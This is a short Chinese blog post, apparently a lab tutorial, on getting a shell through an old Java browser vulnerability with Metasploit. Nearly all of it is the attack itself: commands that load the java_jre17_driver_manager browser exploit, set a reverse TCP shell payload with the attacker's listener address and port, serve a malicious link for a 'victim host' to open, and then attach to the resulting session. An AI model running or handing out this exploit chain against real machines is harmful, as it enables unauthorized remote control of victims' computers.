1.1.1 基于java漏洞获取shell
1.1.1.1 生成攻击链接
msf6 > search jre17
msf6 > use exploit/multi/browser/java_jre17_driver_manager [*] No payload configured, defaulting to java/meterpreter/reverse_tcp msf6 exploit(multi/browser/java_jre17_driver_manager) > set payload java/shell/reverse_tcp payload => java/shell/reverse_tcp msf6 exploit(multi/browser/java_jre17_driver_manager) > set LHOST 192.168.10.180 LHOST => 192.168.10.180 msf6 exploit(multi/browser/java_jre17_driver_manager) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/browser/java_jre17_driver_manager) > exploit # 会自动在后台运行 [*] Exploit running as background job 5. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.10.180:4444 [*] Using URL: http://192.168.10.180:8080/efJCThfUK2 [*] Server started.
1.1.1.2 被害主机访问网址
1.1.1.3 查看获取shell
msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions
msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions -i 8
温馨提示:本文最后更新于
转载请注明本文链接:https://blog.leonshadow.cn/763482/3023.html
2022-12-20 20:57:31
,已超过494
天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!转载请注明本文链接:https://blog.leonshadow.cn/763482/3023.html
© 版权声明
THE END